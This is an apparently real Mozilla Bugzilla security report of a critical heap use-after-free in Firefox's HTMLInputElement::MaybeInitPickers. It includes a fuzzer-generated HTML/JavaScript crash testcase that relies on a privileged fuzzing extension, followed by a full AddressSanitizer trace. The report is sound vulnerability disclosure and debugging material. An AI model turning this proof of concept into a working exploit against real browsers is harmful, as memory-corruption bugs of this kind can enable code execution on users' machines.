Closed
Bug 1378110
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in mozilla::dom::HTMLInputElement::MaybeInitPickers
Categories: Core :: DOM: Events, defect
Status: RESOLVED DUPLICATE of bug 1371259
People: Reporter: nils, Assigned: masayuki
Keywords: csectype-uaf, reporter-external, sec-critical
Attachments (3 files):
877 bytes, text/html
26.61 KB, text/plain
1.03 KB, patch
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170703081455). The testcase requires the fuzzPriv extension
<script>
function start() {
  // Create an <input type=range> whose 'input' handler calls back into the top window.
  o13=document.createElementNS('http://www.w3.org/1999/xhtml','input');
  o13.setAttribute('oninput','window.top.fun1(this)');
  o13.type='range';
  o206=document.documentElement;
  // Load an iframe; fun0 runs once it has loaded.
  o214=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
  o214.src='data:text/html,<div>';
  o214.addEventListener('load', fun0,false);
  document.documentElement.appendChild(o214);
}
function fun0 () {
  // Move the input into the iframe's document, then send it a trusted key press
  // (fuzzPriv is the privileged fuzzing extension mentioned above).
  o261=o214.contentDocument.documentElement;
  o261.appendChild(o13);
  fuzzPriv.trustedKeyEvent(o13,'press',false,false,true,false,36,0);
}
function fun1() {
  // Runs from the 'input' handler, i.e. while the key event is still being dispatched:
  // reparent the top document's root, spin a synchronous XHR, then force GC and CC.
  o326=document.createElementNS('http://www.w3.org/1999/xhtml','li');
  o326.appendChild(o206);
  x = new XMLHttpRequest();
  x.open('POST','https://www.mozilla.org',false);
  try{x.send("X");}catch(e){}
  fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==3981==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000283638 at pc 0x7f7876697a6f bp 0x7ffe555ccbb0 sp 0x7ffe555ccba8
READ of size 4 at 0x611000283638 thread T0 (Web Content)
#0 0x7f7876697a6e in DefaultPrevented /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:194:12
#1 0x7f7876697a6e in DefaultPrevented /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:467
#2 0x7f7876697a6e in mozilla::dom::HTMLInputElement::MaybeInitPickers(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:4206
#3 0x7f787669aa6d in mozilla::dom::HTMLInputElement::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:4740:10
#4 0x7f78763e38b7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:415:12
#5 0x7f78763e38b7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:467
#6 0x7f78763e3e3c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:517:5
#7 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#8 0x7f78763b605a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:893:12
#9 0x7f787472a141 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1343:5
#10 0x7f787640eed4 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:80:9
#11 0x7f7875b915a2 in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle<JSObject*>, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:974:21
#12 0x7f7875b8e9d0 in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1150:13
#13 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#14 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#15 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#16 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#17 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#18 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#19 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#20 0x7f787cebaf93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
#21 0x7f78732462fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#23 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#24 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#25 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#26 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#27 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#28 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#29 0x7f787cebce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#30 0x7f7875ab1467 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7f787640177f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#32 0x7f787640177f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1139
#33 0x7f7876403692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
#34 0x7f78763e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
#35 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#36 0x7f787430abe0 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3999:7
#37 0x7f78763e38b7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:415:12
#38 0x7f78763e38b7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:467
#39 0x7f78763e3e3c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:517:5
#40 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#41 0x7f787863e94f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7
#42 0x7f787b58df3a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7698:21
#43 0x7f787b589f98 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7496:7
#44 0x7f787b59150f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7393:13
#45 0x7f7873518a22 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1299:3
#46 0x7f7873517a1c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:860:14
#47 0x7f7873514868 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:749:9
#48 0x7f7873516732 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:631:5
#49 0x7f787351745c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:487:14
#50 0x7f7871c06ce3 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#51 0x7f7874667a9b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8922:18
#52 0x7f7874667662 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8844:9
#53 0x7f7874641175 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5365:3
#54 0x7f7874703662 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1138:12
#55 0x7f7874703662 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1144
#56 0x7f7874703662 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1187
#57 0x7f7871a391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
#58 0x7f7871a65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
#59 0x7f7871a6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
#60 0x7f787284a1f1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#61 0x7f78727a6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
#62 0x7f78727a6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
#63 0x7f78727a6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
#64 0x7f7877e4ca6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#65 0x7f787c07fa47 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
#66 0x7f78727a6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
#67 0x7f78727a6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
#68 0x7f78727a6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
#69 0x7f787c07f4ad in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
#70 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
#71 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
#72 0x7f788ec1a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
#73 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)
0x611000283638 is located 56 bytes inside of 248-byte region [0x611000283600,0x6110002836f8)
freed by thread T0 (Web Content) here:
#0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7f78763ecdac in mozilla::dom::Event::~Event() /home/worker/workspace/build/src/dom/events/Event.cpp:132:5
#2 0x7f7876450b52 in ~UIEvent /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/UIEvent.h:97:15
#3 0x7f7876450b52 in mozilla::dom::KeyboardEvent::~KeyboardEvent() /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/KeyboardEvent.h:76
#4 0x7f7871909717 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25
#5 0x7f787191069b in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2849:3
#6 0x7f787191069b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3851
#7 0x7f787190fbb3 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3672:9
#8 0x7f7871913990 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4209:21
#9 0x7f7874743972 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1693:3
#10 0x7f78742a99ed in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1401:3
#11 0x7f7871a85371 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
#12 0x7f787331e2cb in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
#13 0x7f787331e2cb in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
#14 0x7f787331e2cb in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
#15 0x7f787332537f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:966:12
#16 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#17 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#18 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#19 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#20 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#21 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#22 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#23 0x7f787cebaf93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
#24 0x7f78732462fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#25 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#26 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#27 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#28 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#29 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#30 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#31 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#32 0x7f787d19624e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
#33 0x7f787d15a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
#34 0x7f787d1763d3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
#35 0x7f787d178da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
#36 0x7f787c545b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#37 0x7f787c545b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
#38 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#39 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
previously allocated by thread T0 (Web Content) here:
#0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f7876439f93 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f7876439f93 in mozilla::dom::KeyboardEvent::KeyboardEvent(mozilla::dom::EventTarget*, nsPresContext*, mozilla::WidgetKeyboardEvent*) /home/worker/workspace/build/src/dom/events/KeyboardEvent.cpp:19
#4 0x7f787643e817 in NS_NewDOMKeyboardEvent(mozilla::dom::EventTarget*, nsPresContext*, mozilla::WidgetKeyboardEvent*) /home/worker/workspace/build/src/dom/events/KeyboardEvent.cpp:355:34
#5 0x7f787638d1fa in mozilla::EventDispatcher::CreateEvent(mozilla::dom::EventTarget*, nsPresContext*, mozilla::WidgetEvent*, nsAString const&, mozilla::dom::CallerType) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:990:12
#6 0x7f7874660f62 in nsIDocument::CreateEvent(nsAString const&, mozilla::dom::CallerType, mozilla::ErrorResult&) const /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8017:5
#7 0x7f7875aed089 in mozilla::dom::DocumentBinding::createEvent(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1459:57
#8 0x7f7876048b1e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3028:13
#9 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#10 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#11 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#12 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#13 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#14 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#15 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#16 0x7f787cebaf93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
#17 0x7f78732462fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#18 0x7f787c545724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#19 0x7f787c545724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#20 0x7f787c52e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#21 0x7f787c52e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#22 0x7f787c5152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#23 0x7f787c5458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#24 0x7f787c546212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#25 0x7f787cebce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#26 0x7f7875ab1467 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#27 0x7f787640177f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#28 0x7f787640177f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1139
#29 0x7f7876403692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
#30 0x7f78763e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
#31 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#32 0x7f787430abe0 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3999:7
#33 0x7f78763e38b7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:415:12
#34 0x7f78763e38b7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:467
#35 0x7f78763e3e3c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:517:5
#36 0x7f78763e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BasicEvents.h:194:12 in DefaultPrevented
Shadow bytes around the buggy address:
0x0c2280048670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2280048680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c2280048690: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c22800486a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c22800486b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=>0x0c22800486c0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
0x0c22800486d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c22800486e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c22800486f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2280048700: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c2280048710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
